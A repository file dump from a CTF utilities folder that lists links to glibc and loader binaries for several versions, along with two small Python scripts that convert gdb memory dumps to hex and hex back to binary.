/utils/Pwn/libc/x64/Libc23/libc64_2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc23/libc64_2.23.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc24/ld64_2.24.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc24/ld64_2.24.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc24/libc64_2.24.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc24/libc64_2.24.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc27/ld64_2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc27/ld64_2.27.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc27/libc64_2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc27/libc64_2.27.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc28/ld64_2.28.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc28/ld64_2.28.so -------------------------------------------------------------------------------- 
/utils/Pwn/libc/x64/Libc28/libc64_2.28.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc28/libc64_2.28.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc29/ld64_2.29.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc29/ld64_2.29.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc29/libc64_2.29.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc29/libc64_2.29.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc31/ld64_2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc31/ld64_2.31.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x64/Libc31/libc64_2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x64/Libc31/libc64_2.31.so -------------------------------------------------------------------------------- /utils/Pwn/libc/x86/Libc23/ld32_2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x86/Libc23/ld32_2.23.so -------------------------------------------------------------------------------- 
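/utils/Pwn/libc/x86/Libc23/libc32_2.23.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x86/Libc23/libc32_2.23.so
--------------------------------------------------------------------------------
/utils/Pwn/libc/x86/Libc24/ld32_2.24.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x86/Libc24/ld32_2.24.so
--------------------------------------------------------------------------------
/utils/Pwn/libc/x86/Libc24/libc32_2.24.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x86/Libc24/libc32_2.24.so
--------------------------------------------------------------------------------
/utils/Pwn/libc/x86/Libc29/ld32_2.29.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x86/Libc29/ld32_2.29.so
--------------------------------------------------------------------------------
/utils/Pwn/libc/x86/Libc29/libc32_2.29.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/utils/Pwn/libc/x86/Libc29/libc32_2.29.so
--------------------------------------------------------------------------------
/utils/Reverse/GDB2HEX.py:
--------------------------------------------------------------------------------
### Resolve gdb x/gx result to hexdump format
#
# Reads a saved `x/gx` listing and writes <filename>.hex: the dumped bytes as
# space-separated hex pairs. An existing <filename>.hex is overwritten.

import binascii

print('filename : ',end = '')
name = input()
with open(name) as dump:
    rows = dump.read().split('\n')

hex_pairs = []
for row in rows:
    # Everything up to the first tab is the address column; the remaining
    # tab-separated fields are the 0x-prefixed 8-byte words.
    for word in row[row.find('\t')+1:].split('\t'):
        # Walk the 16 hex digits from the last pair to the first, so the bytes
        # come out least-significant first (memory order on a little-endian
        # target). Blank or short fields contribute nothing.
        for k in range(16,0,-2):
            pair = word[k:k+2]
            if pair:
                hex_pairs.append(pair)

with open(name+'.hex','w') as out:
    out.write(' '.join(hex_pairs))

--------------------------------------------------------------------------------
/utils/Reverse/RESOLVEHEX.py:
--------------------------------------------------------------------------------
### Resolve hexdumped file back to binary
#
# Reads a text file of space-separated hex pairs and writes the decoded bytes
# to <filename>.bin. An existing <filename>.bin is overwritten.

import binascii

print('filename : ',end = '')
name = input()
with open(name) as dump:
    tokens = ' '.join(dump.read().split('\n')).strip().split(' ')

# Only two-character tokens are treated as byte values; tokens of any other
# length are skipped.
hex_digits = ''.join(tok for tok in tokens if len(tok)==2)

# Decode before opening the output, so a two-character token that is not valid
# hex raises binascii.Error without leaving an empty .bin file behind.
payload = binascii.unhexlify(hex_digits.encode('utf-8'))
with open(name+'.bin','wb') as out:
    out.write(payload)

--------------------------------------------------------------------------------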